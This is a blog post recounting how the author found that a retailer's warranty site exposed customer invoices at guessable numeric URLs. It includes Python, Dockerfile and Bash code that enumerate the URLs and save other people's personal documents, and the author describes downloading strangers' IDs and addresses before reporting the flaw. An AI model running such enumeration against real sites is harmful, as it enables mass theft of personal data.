Shopping IL (AKA “Israeli Black Friday invented by Google”) came and went, and with it, a sizeable part of my income. I did only buy things I truly needed, like a new keyboard, chair, and well, a blender.

Why is this blender so special, then? Read more to find out, duh… I am nothing if not a glorious storyteller who works in tech.

Upon receiving the blender, I open the cardboard box in which the shipment arrived, and discover my invoice inside, with instructions on how to activate my warranty. Ok, cool. I navigate to the website, fill in the online form, and upload a picture of the invoice. A minute later, I receive an email, which goes something like this:

Hey Orel,
Thanks for activating your warranty with us!
...
blah blah blah
...
Here's a link to your invoice:
https://our-website.com/wp-content/uploads/2021/11/278192.jpg

“Hell naw”, I exclaimed. There’s no way they just generated a numeric name for the picture I uploaded (containing my ID number, phone number, full name and address) and put it on their site where anyone can reach it. So I decided to check whether that was indeed the case, and whether other people’s personal data could be exposed the same way.
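To put rough numbers on why a short numeric file name is worrying, here is a minimal sketch. It assumes names are six-digit numbers like the one in the email (nothing here is known about how the site actually picks them), and `new_upload_name` is a hypothetical helper showing what an unguessable name could look like using Python's standard `secrets` module.

```python
import secrets


def numeric_name_space(digits: int) -> int:
    """How many different names exist if a name is a number with `digits` digits."""
    return 10 ** digits


def random_token_space(num_bytes: int) -> int:
    """How many different names exist if a name is `num_bytes` random bytes."""
    return 2 ** (8 * num_bytes)


def new_upload_name(num_bytes: int = 16) -> str:
    """Hypothetical helper: build an unguessable file name for an upload."""
    return secrets.token_urlsafe(num_bytes) + ".jpg"


# A six-digit name can be found by counting through at most a million candidates
print(numeric_name_space(6))   # 1000000
# A 16-byte random token has 2**128 possibilities
print(random_token_space(16))
print(new_upload_name())
```

An unguessable name is not access control on its own, but it does take away the "just count upwards" option.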

Since I’d be sending a bunch of requests, I wanted to make things efficient, so I spun up a bunch of containers using Azure Container Instances. Based on its hostname, each container is responsible for checking a certain range of numbers. I created a file share and mounted it on each container. Now, I didn’t want 30 containers running at the same time, so I wrote a Bash script that spins up new containers and increments the number whenever a container exits.
Here’s the Python code I put inside the containers (called map.py):

import os
import grequests

# Get the container name from the given hostname (for example, my-cont-1)
cont_name = os.environ['CONTAINER_HOSTNAME']
cont_number = cont_name.split('-')[-1]

# The container checks images 1000-1999 if its name is my-cont-1
min_num = int(cont_number + '000')
max_num = int(cont_number + '999') + 1

base_url = 'https://our-website.com/wp-content/uploads/2021/11'

# Create the list of numbers from min_num up to (but not including) max_num
numbers_to_check = list(range(min_num, max_num))

# Map the requests, print each result, and log each URL as found/not found
current_requests = (grequests.get(f'{base_url}/{k}.jpg', stream=False) for k in numbers_to_check)
results = grequests.imap(current_requests, size=4)
for r in results:
    if r.status_code == 200:
        with open(f'/mnt/cloudfs/valid_invoices_{cont_name}.txt', 'a') as f:
            f.write(f'{r.url}\n')
        filename = r.url.split('/')[-1]
        with open(f'/mnt/cloudfs/images/{filename}', 'wb') as f:
            f.write(r.content)
    else:
        with open(f'/mnt/cloudfs/invalid_invoices_{cont_name}.txt', 'a') as f:
            f.write(f'{r.url}\n')
    print(f'{r.url}: {r.status_code}')
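The range arithmetic is the easiest part to get wrong, so here is a minimal standalone sketch of it that can be checked without any containers. `id_range_for` and `block_size` are names made up for this illustration; it multiplies instead of gluing strings together, which gives the same ranges as map.py for names like my-cont-1.

```python
def id_range_for(container_name: str, block_size: int = 1000) -> range:
    """Return the block of image numbers a container is responsible for."""
    # The container's index is whatever follows the last '-' in its name
    index = int(container_name.rsplit("-", 1)[-1])
    start = index * block_size
    # range() excludes its end, so this covers start .. start + block_size - 1
    return range(start, start + block_size)


r = id_range_for("my-cont-1")
print(r.start, r[-1])  # 1000 1999
```

Container 0 gets 0-999, container 12 gets 12000-12999, and so on, with no overlap between neighbours.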

Here’s the Dockerfile:

FROM python

WORKDIR /opt/myimage

COPY ./map.py .

RUN pip install grequests

CMD ["python3", "./map.py"]

And here’s the script that rotates containers when they are done (which I set up as a cron job):

#!/bin/bash

# Name of Resource Group in Azure
ACI_PERS_RESOURCE_GROUP=my-aci-rg

# Name of Storage Account in Azure
ACI_PERS_STORAGE_ACCOUNT_NAME=imagemapperstorage

# Name of File Share in Azure
ACI_PERS_SHARE_NAME=cloudfs

# Prefix for container name
CONTAINER_NAME_PREFIX=invoice-mapper

# Get currently running containers
CURRENT_CONTAINERS=($(az container list -g $ACI_PERS_RESOURCE_GROUP --query "[].name" -o tsv))

# Get storage account key for mounting the file share on the containers
STORAGE_KEY=$(az storage account keys list --resource-group $ACI_PERS_RESOURCE_GROUP --account-name $ACI_PERS_STORAGE_ACCOUNT_NAME --query "[0].value" --output tsv)


COCURRENT_CONTAINERS=6
MAX_CONTAINER_NUMBER=9999999

# Create function for creating containers
# USAGE: create_container <name>
create_container () {
    cont_name=$1
    az container create \
    --resource-group $ACI_PERS_RESOURCE_GROUP \
    --name $cont_name \
    --image mycontainerimage:mytag \
    --dns-name-label $cont_name \
    --azure-file-volume-account-name $ACI_PERS_STORAGE_ACCOUNT_NAME \
    --azure-file-volume-account-key $STORAGE_KEY \
    --azure-file-volume-share-name $ACI_PERS_SHARE_NAME \
    --azure-file-volume-mount-path /mnt/cloudfs \
    --environment-variables CONTAINER_HOSTNAME=$cont_name \
    --restart-policy Never 1> /dev/null
}

# Create function for deleting containers
# USAGE: delete_container <name>
delete_container () {
    cont_name=$1
    az container delete \
        --resource-group $ACI_PERS_RESOURCE_GROUP \
        --name $cont_name \
        --yes 1> /dev/null
}


# Set CURRENT_COUNTER to the highest container number
CURRENT_COUNTER=-1
for i in "${CURRENT_CONTAINERS[@]}"; do
    # Everything after the last '-' is the container number
    number=${i##*-}
    # (( )) compares numerically; [[ a > b ]] compares as strings, so "10" would sort before "9"
    if (( number > CURRENT_COUNTER )); then
        CURRENT_COUNTER=$number
    fi
done

# Create new containers if the number of containers is below COCURRENT_CONTAINERS
echo "${#CURRENT_CONTAINERS[@]} containers currently running"
if (( ${#CURRENT_CONTAINERS[@]} < COCURRENT_CONTAINERS )); then
    MISSING_CONTAINERS=$((COCURRENT_CONTAINERS - ${#CURRENT_CONTAINERS[@]}))
    NUMBER_TO_COUNT_TO=$((MISSING_CONTAINERS + CURRENT_COUNTER))
    CURRENT_COUNTER=$((CURRENT_COUNTER + 1))
    for i in $(seq "$CURRENT_COUNTER" "$NUMBER_TO_COUNT_TO"); do
        echo "Creating container $CONTAINER_NAME_PREFIX-$i"
        create_container "$CONTAINER_NAME_PREFIX-$i"
        CURRENT_COUNTER=$i
    done
fi

# Check for terminated containers and rotate them
if (( CURRENT_COUNTER < MAX_CONTAINER_NUMBER )); then
    CURRENT_CONTAINERS=($(az container list -g $ACI_PERS_RESOURCE_GROUP --query "[].name" -o tsv))
    for CONTAINER in "${CURRENT_CONTAINERS[@]}"; do
        CONTAINER_NAME=$CONTAINER
        CONTAINER_STATE=$(az container show --resource-group $ACI_PERS_RESOURCE_GROUP -n $CONTAINER_NAME --query "[containers[0].instanceView.currentState.state]" --output tsv)
        # Container state contains a trailing tab which we must get rid of
        #CONTAINER_STATE=${CONTAINER_STATE%?}
        # Extract the number from the container name (everything after the last '-')
        CONTAINER_NUMBER=${CONTAINER_NAME##*-}
        if [[ $CONTAINER_STATE == "Running" ]]; then
            echo "$CONTAINER_NAME is up"
        else
            echo "$CONTAINER_NAME is $CONTAINER_STATE"
            # CURRENT_COUNTER holds the highest number already in use, so move to the next one first
            CURRENT_COUNTER=$((CURRENT_COUNTER + 1))
            echo "$CONTAINER_NAME --> $CONTAINER_NAME_PREFIX-$CURRENT_COUNTER"
            delete_container "$CONTAINER_NAME" && create_container "$CONTAINER_NAME_PREFIX-$CURRENT_COUNTER"
        fi
    done
fi

The Bash script was, honestly, a bit complicated for me to write, but I learned a ton in the process about how Bash arrays work and how to extract substrings. Considering I haven’t done a lot of Bash scripting in the past, I’m happy with the resulting code.
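For comparison, the bookkeeping the rotation script does (find the highest number in use, top up to the concurrency limit, replace anything that is no longer running) can be sketched as a pure Python function that touches no Azure APIs. This is only one way to express the idea, not the script itself: `plan_rotation` and its parameters are hypothetical names, the states are plain strings supplied by the caller, and the MAX_CONTAINER_NUMBER cap is left out for brevity. It needs Python 3.9 or newer for the built-in generic type hints.

```python
def container_number(name: str) -> int:
    """Extract the trailing number from a name like 'invoice-mapper-12'."""
    return int(name.rsplit("-", 1)[-1])


def plan_rotation(
    states: dict[str, str], prefix: str, concurrent: int
) -> tuple[list[str], list[str]]:
    """Return (names_to_delete, names_to_create) for one scheduler run."""
    # Highest number in use, compared as integers so 10 sorts after 9
    counter = max((container_number(n) for n in states), default=-1)
    # Anything that is not running has finished its range and gets replaced
    to_delete = [name for name, state in states.items() if state != "Running"]
    # Containers needed to reach the concurrency limit
    missing = max(concurrent - len(states), 0)
    to_create = []
    for _ in range(missing + len(to_delete)):
        counter += 1
        to_create.append(f"{prefix}-{counter}")
    return to_delete, to_create


states = {"invoice-mapper-9": "Running", "invoice-mapper-10": "Terminated"}
print(plan_rotation(states, "invoice-mapper", 2))
# (['invoice-mapper-10'], ['invoice-mapper-11'])
```

Keeping the planning separate from the `az` calls makes the counter logic easy to test before any container is created.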

Well, unfortunately, I did find other people’s info: full names, addresses, the last 4 digits of their credit cards, ID numbers and phone numbers. I quickly contacted the company, which swiftly implemented a CAPTCHA powered by Cloudflare for all images, including non-existent ones (thus returning HTTP 403 for all requests).

About the Author

Orel Fichman

Tech Blogger, DevOps Engineer, and Microsoft Certified Trainer
